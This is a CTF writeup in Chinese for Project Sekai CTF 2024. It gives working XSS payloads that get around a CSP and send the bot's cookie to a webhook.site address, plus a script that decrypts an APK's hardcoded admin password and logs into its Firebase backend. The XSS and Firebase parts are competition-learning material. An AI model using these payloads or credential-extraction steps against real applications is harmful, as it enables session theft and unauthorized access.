owned this note
owned this note
Published
Linked with GitHub
# Project Sekai CTF 2024 Writeup by ICEDTEA
## WEB
### Tagless
> Solver: Whale120
一道XSS的題目
**app.py**
```py
from flask import Flask, render_template, make_response,request
from bot import *
from urllib.parse import urlparse
app = Flask(__name__, static_folder='static')
@app.after_request
def add_security_headers(resp):
resp.headers['Content-Security-Policy'] = "script-src 'self'; style-src 'self' https://fonts.googleapis.com https://unpkg.com 'unsafe-inline'; font-src https://fonts.gstatic.com;"
return resp
@app.route('/')
def index():
return render_template('index.html')
@app.route("/report", methods=["POST"])
def report():
bot = Bot()
url = request.form.get('url')
if url:
try:
parsed_url = urlparse(url)
except Exception:
return {"error": "Invalid URL."}, 400
if parsed_url.scheme not in ["http", "https"]:
return {"error": "Invalid scheme."}, 400
if parsed_url.hostname not in ["127.0.0.1", "localhost"]:
return {"error": "Invalid host."}, 401
bot.visit(url)
bot.close()
return {"visited":url}, 200
else:
return {"error":"URL parameter is missing!"}, 400
@app.errorhandler(404)
def page_not_found(error):
path = request.path
return f"{path} not found"
if __name__ == '__main__':
app.run(debug=True)
```
bot的部分就是再正常不過的Chrome無頭瀏覽器設定好cookie(flag)後造訪。
先來看csp:
```csp
script-src 'self'; style-src 'self' https://fonts.googleapis.com https://unpkg.com 'unsafe-inline'; font-src https://fonts.gstatic.com;
```
`script-src`的部分設定了self,再仔細看看網站404的功能會發現他完整輸出了path,那不就跟[利用jsonp bypass csp(link)](https://hurricanelabs.com/blog/bypassing-csp-with-jsonp-endpoints/)的trick有異曲同工之妙,簡單舉個例子:
在這裡,我可以透過造訪`http://127.0.0.1:5000/**/alert(1);//.js`獲得一段像這樣的內容:
這不就裸裸的js codeㄌ
引入js這塊算解決了...嗎?
答案是否定的,看看index.html和app.js
**index.html**
```html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Tagless</title>
<link href="https://fonts.googleapis.com/css?family=Press+Start+2P" rel="stylesheet">
<link rel="stylesheet" href="https://unpkg.com/nes.css@2.3.0/css/nes.css" />
<style>
body, html {
height: 100%;
margin: 0;
display: flex;
justify-content: center;
align-items: center;
background-color: #212529;
color: #fff;
font-family: 'Press Start 2P', cursive;
}
.container {
text-align: center;
}
.nes-field, .nes-btn {
margin-top: 20px;
}
iframe {
width: 100%;
height: 300px;
border: none;
margin-top: 20px;
color: #212529;
background-color: #FFF;
font-family: 'Press Start 2P', cursive;
}
.nes-container.is-dark.with-title {
background-color: #212529;
}
</style>
</head>
<body>
<div class="container">
<section class="nes-container with-title is-centered is-dark">
<h2 class="title">Tagless Display</h2>
<div class="nes-field is-inline">
<label for="userInput" class="nes-text is-primary">Your Message:</label>
<input type="text" id="userInput" class="nes-input" placeholder="Hello, Retro World!">
</div>
<button id="displayButton" type="button" class="nes-btn is-primary">Display</button>
<div class="output">
<iframe id="displayFrame"></iframe>
</div>
</section>
</div>
<script src="/static/app.js"></script>
</body>
</html>
```
怎麼樣,看起來是不是會被塞進iframe,那iframe有個特性,就是所有被執行的javascript必須是被嵌入的網站本身有的,或者在iframe裡面有個 `srcdoc` 的選項,詳細資訊可以看這篇:[huli大大的筆記](https://blog.huli.tw/2022/04/07/iframe-and-window-open/)
不過更重要的,先來看app.js!
**app.js**
```js
document.addEventListener("DOMContentLoaded", function() {
var displayButton = document.getElementById("displayButton");
displayButton.addEventListener("click", function() {
displayInput();
});
});
function sanitizeInput(str) {
str = str.replace(/<.*>/igm, '').replace(/<\.*>/igm, '').replace(/<.*>.*<\/.*>/igm, '');
return str;
}
function autoDisplay() {
const urlParams = new URLSearchParams(window.location.search);
const input = urlParams.get('auto_input');
displayInput(input);
}
function displayInput(input) {
const urlParams = new URLSearchParams(window.location.search);
const fulldisplay = urlParams.get('fulldisplay');
var sanitizedInput = "";
if (input) {
sanitizedInput = sanitizeInput(input);
} else {
var userInput = document.getElementById("userInput").value;
sanitizedInput = sanitizeInput(userInput);
}
var iframe = document.getElementById("displayFrame");
var iframeContent = `
<!DOCTYPE html>
<head>
<title>Display</title>
<link href="https://fonts.googleapis.com/css?family=Press+Start+2P" rel="stylesheet">
<style>
body {
font-family: 'Press Start 2P', cursive;
color: #212529;
padding: 10px;
}
</style>
</head>
<body>
${sanitizedInput}
</body>
`;
iframe.contentWindow.document.open('text/html', 'replace');
iframe.contentWindow.document.write(iframeContent);
iframe.contentWindow.document.close();
if (fulldisplay && sanitizedInput) {
var tab = open("/")
tab.document.write(iframe.contentWindow.document.documentElement.innerHTML);
}
}
autoDisplay();
```
呵呵,有趣了,所有的html tag都會被過濾,不過其實在瀏覽器上可以使用`<img src='meowmeow.jpg'`之類的方法插入一個html tag,但也只有一個可以插 :D
那不管,先來想想用現有的材料可以怎麼玩ㄅ
一開始的想法是利用 iframe 的 srcdoc inject 一段javascript程式碼就好,防止html標籤被過濾甚至可以用 src 再加上`data:text/html;base64,`把他編碼,於是先嘗試這段payload:
```
http://127.0.0.1:5000/?auto_input=%3Ciframe%20src=%22data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly8xMjcuMC4wLjE6NTAwMC8qKi9hbGVydCgxKTsvLy5qcyIvPg==%22
```
把`<script src="http://127.0.0.1:5000/**/alert(1);//.js" ></script>`base64 encode,然後自己塞一個初始化就有js的frame就彈出來ㄌ,然而...有這麼容易嗎?
並沒有,再塞入像是 `<script src="http://127.0.0.1:5000/**/location.href='https://webhook.site/d37cfcd6-38b3-4333-affe-c5ca094a0f5a/'+document.cookie;//.js" ></script>` 這樣的payload試著偷cookie後就發現轉不出去,為什麼呢?
因為iframe內部的location並不是網站的location,導致他根本不能吃網站的location...
回去看一下404頁面,其實他能做的不只有任意的js,在瀏覽器裡面,他會根據前面的內容決定用什麼方法Render資訊(譬如說xml, html還是單純文字輸出),所以最後的做法就是把xss透過404 page inject進去,最後再去iframe他,規避掉<>過濾的方法可以用urlencode就好:
final payload:
```
http://127.0.0.1:5000/?auto_input=%3Ciframe%20src%3D%22http%3A%2F%2F127.0.0.1%3A5000%2F%26lt%3Bscript%20src%3D%26quot%3Bhttp%3A%2F%2F127.0.0.1%3A5000%2F%2A%2A%2F%20location.href%3D%26%2339%3Bhttps%3A%2F%2Fwebhook.site%2Fd37cfcd6-38b3-4333-affe-c5ca094a0f5a%2Fa%26%2339%3B%2Bdocument.cookie%3B%2F%2F.js%26quot%3B%26gt%3B%26lt%3B%2Fscript%26gt%3B%22
```
然後再url encode一次(bot會把他先decode再送去瀏覽器)
欸...不是啊,所以前面iframe那麼多在幹嘛?
~~直接丟一個~~`http://127.0.0.1:5000/<script src="http://127.0.0.1:5000/**/ fetch('https://webhook.site/d37cfcd6-38b3-4333-affe-c5ca094a0f5a/'+document.cookie);//.js"></script>`結束這回合不就得了...?
喔對,他沒給bot GUI介面,自己發CURL
好啦因為走遠路多學了好多東西,分享一下>W<
> FLAG: SEKAI{w4rmUpwItHoUtTags}
## Reverse
### Crack Me
> Solver: Whale120
先丟 [decompile(link)](https://www.decompiler.com/jar/7028603f8f0f482eb1f757ffefee74aa/CrackMe.apk)
首先起手式逛了一下`/sources/com/SekaiCTF/CrackMe`,沒有東西...
痾...直接裝起來看ㄅ:
Ok,登入頁面那邊有個是不是Admin的提示,grep一下Admin這個字串找檔案,發現 `./resources/assets/index.android.bundle`
參考[這篇(link)](https://book.jorianwoltjer.com/mobile/reversing-apks#react-native)
拆開來翻找一下找到`443.js`,看起來蠻有趣的。
觀察這一段程式碼:
上面這段也點了從哪裡抓flag
看起來邏輯長這樣:從477.js initial了app、也會從456.js抓key和iv出來做加密,所以把這些資訊摳出來:
**477.js**
```js
var c = {
apiKey: 'AIzaSyCR2Al5_9U5j6UOhqu0HCDS0jhpYfa2Wgk',
authDomain: 'crackme-1b52a.firebaseapp.com',
projectId: 'crackme-1b52a',
storageBucket: 'crackme-1b52a.appspot.com',
messagingSenderId: '544041293350',
appId: '1:544041293350:web:2abc55a6bb408e4ff838e7',
measurementId: 'G-RDD86JV32R',
databaseURL: 'https://crackme-1b52a-default-rtdb.firebaseio.com',
};
exports.default = c;
```
**456.js**
```js
var _ = {
LOGIN: 'LOGIN',
EMAIL_PLACEHOLDER: 'user@sekai.team',
PASSWORD_PLACEHOLDER: 'password',
BEGIN: 'CRACKME',
SIGNUP: 'SIGN UP',
LOGOUT: 'LOGOUT',
KEY: 'react_native_expo_version_47.0.0',
IV: '__sekaictf2023__',
};
exports.default = _;
```
先從456.js的資訊還原密碼
```py
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import binascii
KEY = 'react_native_expo_version_47.0.0'
IV = '__sekaictf2023__'
key_bytes = KEY.encode('utf-8')
iv_bytes = IV.encode('utf-8')
ciphertext_hex = '03afaa672ff078c63d5bdb0ea08be12b09ea53ea822cd2acef36da5b279b9524'
ciphertext_bytes = binascii.unhexlify(ciphertext_hex)
cipher = AES.new(key_bytes, AES.MODE_CBC, iv_bytes)
decrypted = unpad(cipher.decrypt(ciphertext_bytes), AES.block_size)
decrypted_password = decrypted.decode('utf-8')
print(decrypted_password)
```
解出來是`s3cr3t_SEKAI_P@ss`
拿到資訊之後上網看一下怎麼連,然後~~求助億下ChatGPT~~,最後寫出腳本撈flag
```py
import requests
import json
api_key = "AIzaSyCR2Al5_9U5j6UOhqu0HCDS0jhpYfa2Wgk"
database_url = "https://crackme-1b52a-default-rtdb.firebaseio.com"
email = "admin@sekai.team"
password = "s3cr3t_SEKAI_P@ss"
login_url = f"https://identitytoolkit.googleapis.com/v1/accounts:signInWithPassword?key={api_key}"
login_payload = {
"email": email,
"password": password,
"returnSecureToken": True
}
login_response = requests.post(login_url, data=json.dumps(login_payload), headers={"Content-Type": "application/json"})
login_response.raise_for_status()
id_token = login_response.json().get("idToken")
if not id_token:
raise Exception("Failed to get ID Token")
print("Login successful")
user_id = login_response.json().get("localId")
flag_path = f"/users/{user_id}/flag"
data_url = f"{database_url}{flag_path}.json?auth={id_token}"
response = requests.get(data_url)
if response.status_code == 200:
flag_data = response.json()
print(f"Flag: {flag_data}")
else:
print(f"Error retrieving data: {response.status_code} {response.text}")
```
> Flag: SEKAI{15_React_N@71v3_R3v3rs3_H@RD???}
## PPC
WTF?
CTF比賽打競程,認真?
對 :D,主辦2022的時候的題目沒用到覺得很可惜 ...
### Miku vs. Machine
> Solver: Whale120
題目敘述:
基本上我的做法就是直接構造l=n,然後for迴圈刷過去每場安排每個id的表演者都表演n單位時間直到他現在的總表演時間加起來已經夠了,那就切下一位表演者,簡單的乘除就可以知道這樣的構造一定會對。
**solve.cpp**
```cpp
#include<bits/stdc++.h>
using namespace std;
void solve(){
int n, m, cur, amt;
cin >> n >> m;
amt=m;
cur=1;
cout << n << '\n';
for(int i=1;i<=m;i++){
if(amt >= n){
cout << n << ' ' << cur << ' ' << 0 << ' ' << cur << '\n';
amt-=n;
}
else{
cout << amt << ' ' << cur << ' ' << n-amt << ' ' << cur+1 << '\n';
cur++;
amt=m-(n-amt);
}
}
}
int main(){
int t;
cin >> t;
while(t--){
solve();
}
return 0;
}
```
> Flag: SEKAI{t1nyURL_th1s:_6d696b75766d}
Google Drive
Gist
Clipboard
Sign in with Wallet
